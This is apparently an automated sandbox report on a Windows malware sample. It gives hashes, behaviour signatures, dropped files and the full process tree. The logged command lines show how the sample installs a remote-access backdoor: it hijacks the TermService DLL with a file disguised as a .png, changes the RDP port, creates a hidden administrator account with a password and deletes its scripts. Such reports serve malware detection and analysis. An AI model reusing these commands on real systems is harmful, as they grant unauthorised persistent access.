Analysis
- max time kernel: 55s
- max time network: 124s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 11-11-2020 10:53

Static task: static1
Behavioral task: behavioral1
  Sample: cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe
  Resource: win10v20201028
General
- Target: cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe
- Size: 3.1MB
- MD5: 63a4fa287d067ff9083c6d2bf5735016
- SHA1: 0e1ca1394559574751ba43f377aeea877ae4705c
- SHA256: cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36
- SHA512: 424e2a60e704b983a4bef4a5c275c1133bbc2fd0b8d1b1b971dd79b74083878a6a8319816fc94d00f2c46e3abbaf7e4a4dd0e7599f6bdd80322f3d8a1f8a2121
Malware Config
Signatures
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
- resource                          yara_rule
  \Windows\Branding\mediasrv.png    upx
  \Windows\Branding\mediasvc.png    upx
- Loads dropped DLL (2 IoCs)
  pid     process
  1696
  1696
- Modifies service (2 TTPs, 2 IoCs)
  description        ioc                                                                                                                            process
  Key created        \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters                                                          reg.exe
  Set value (str)    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"    reg.exe
- Drops file in Windows directory (8 IoCs)
  description                     ioc                                  process
  File created                    C:\Windows\branding\wupsvc.jpg       powershell.exe
  File opened for modification    C:\Windows\branding\Basebrd          powershell.exe
  File opened for modification    C:\Windows\branding\ShellBrd         powershell.exe
  File opened for modification    C:\Windows\branding\mediasrv.png     powershell.exe
  File opened for modification    C:\Windows\branding\mediasvc.png     powershell.exe
  File opened for modification    C:\Windows\branding\wupsvc.jpg       powershell.exe
  File created                    C:\Windows\branding\mediasrv.png     powershell.exe
  File created                    C:\Windows\branding\mediasvc.png     powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (15 IoCs)
  pid     process
  4028    powershell.exe
  4028    powershell.exe
  4028    powershell.exe
  1392    powershell.exe
  1392    powershell.exe
  1392    powershell.exe
  640     powershell.exe
  640     powershell.exe
  640     powershell.exe
  3704    powershell.exe
  3704    powershell.exe
  3704    powershell.exe
  4028    powershell.exe
  4028    powershell.exe
  4028    powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  pid     process
  616
  616
- Suspicious use of AdjustPrivilegeToken (67 IoCs)
- Suspicious use of WriteProcessMemory (70 IoCs)
Processes
- C:\Users\Admin\AppData\Local\Temp\cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe"
  signatures: Suspicious use of WriteProcessMemory
  - \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: -ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
    signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.cmdline"
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE93.tmp" "c:\Users\Admin\AppData\Local\Temp\aiaedqju\CSC8AF4BC17464D01A9D7659FDF91E9B.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe
      cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe
      cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      signatures: Modifies service; Modifies registry key
    - C:\Windows\system32\reg.exe
      cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe
      cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        cmdline: cmd /c net start rdpdr
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          cmdline: net start rdpdr
          signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe
            cmdline: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        cmdline: cmd /c net start TermService
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          cmdline: net start TermService
          signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe
            cmdline: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user wgautilacc Ghar4f5 /del
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe user wgautilacc Ghar4f5 /del
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user wgautilacc ZzvnUmPS /add
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe user wgautilacc ZzvnUmPS /add
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user wgautilacc ZzvnUmPS /add
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user wgautilacc ZzvnUmPS
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe user wgautilacc ZzvnUmPS
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user wgautilacc ZzvnUmPS
- C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C net user wgautilacc 1234
  - C:\Windows\system32\net.exe
    cmdline: net user wgautilacc 1234
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user wgautilacc 1234
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5: 525c8172539cddd625bd3fe2e504b75c
  SHA1: 89b62752eaa65c9caf68b4229216b3bfd4091b93
  SHA256: 66a60ca54dba739c590f7644d6e5ef731c51ac80835786f8155fd5dcf8ec3ef4
  SHA512: 4de4d86027cd2f19b274fda37a4319d4f3cdd3729d83f5d58781ce14713403c095455df1434216eeed6a6d06439a92e844edecb7d05a989cf4625e868d53bc31
- C:\Users\Admin\AppData\Local\Temp\RESBE93.tmp
  MD5: 79e08933902978f1643b8582bf3197d7
  SHA1: c2724ed8ddda3141cdc1575fc77b84a1c93a4823
  SHA256: 03ac892aad4412f676a286320a0c67bf9a587dd4bc869f3b8bd051ad9b3cda93
  SHA512: 3ec0d1c7e45c06cdac6dc68f0a4733a7cecb29ee789e28136298a15aed63ed08b1b4b883ef56e769d4174837db38f5fa6a6d1e3fd4d798e5089b486d16529ae0
- C:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.dll
  MD5: e85bbc5001eba2335e3573e08fd8a68c
  SHA1: 5ffc718ccde75123662989b2d0ad89bece2c97e5
  SHA256: 863faaee290b318c2d679d4bb92e518e27410a22e3fe269d2db422d8726c118a
  SHA512: bce1bd6fa0a947e4b7bb48a6ff9e3e2fe04528745db146b2165a80c1166bb5a89fa3abfa3129c1b2e37bc8500e4eb2fbfec867423d4d0b656469bb69a10d0142
- C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5: 41d1a9d1cbee90f1e5f27fdfb299f8b8
  SHA1: 1e9ac27006a7c364649265246fccbd719418ceab
  SHA256: 0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4
  SHA512: f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422
- \??\c:\Users\Admin\AppData\Local\Temp\aiaedqju\CSC8AF4BC17464D01A9D7659FDF91E9B.TMP
  MD5: b853fe0d9efef8656f10907b6beeebd5
  SHA1: 4200f3dc0fe3d704aa00d2070797a05e41fd31ab
  SHA256: 014fb2b2ae663435214e82b414327d2149c012738ab87f67e07832f0b9bfbe43
  SHA512: 1d311a28ed1c073745e2c5d3204cf3a0f94ec9f9ddcddcd3d1b8d27766f540c8ae7d61babc31ca0e96e5e380b4eb54da2f338ebc7613f8d48ded053fbd6fb44e
- \??\c:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.0.cs
  MD5: 8e55cb0ca998472ab6d3e295e0c4dd50
  SHA1: 407d07a29b89fc3afc246c0680d5857e3f51019d
  SHA256: 63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685
  SHA512: c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28
- \??\c:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.cmdline
  MD5: 8dea0e89d03bffd646d16884da5b01a0
  SHA1: 9585070bed528144401068f4a19e8c5612856e2a
  SHA256: 15f568c1692b1774894730a86e019456f11035ed26742b3a5348aca0d0af94b9
  SHA512: f4bc8a23b62e35e61d97d201155d842ef0faf2c490b13802fbe3d6f3e88f69f624c0d9a5b44fae59cbcb28cd0916d6c133635d83ed6ee32dfca3215e596ec841
- \Windows\Branding\mediasrv.png
  MD5: 37fb7ba711ffbe9d6ebb27d54e827966
  SHA1: 4d4d9303e011bcb14720b24239a1aacd58122f47
  SHA256: 81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5
  SHA512: 3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf
- \Windows\Branding\mediasvc.png
  MD5: 2f916498a393e2f0d008d33a74c062ba
  SHA1: 404d52d4253ef3843ae3f2c4aff050f37fcd3f08
  SHA256: d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412
  SHA512: d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10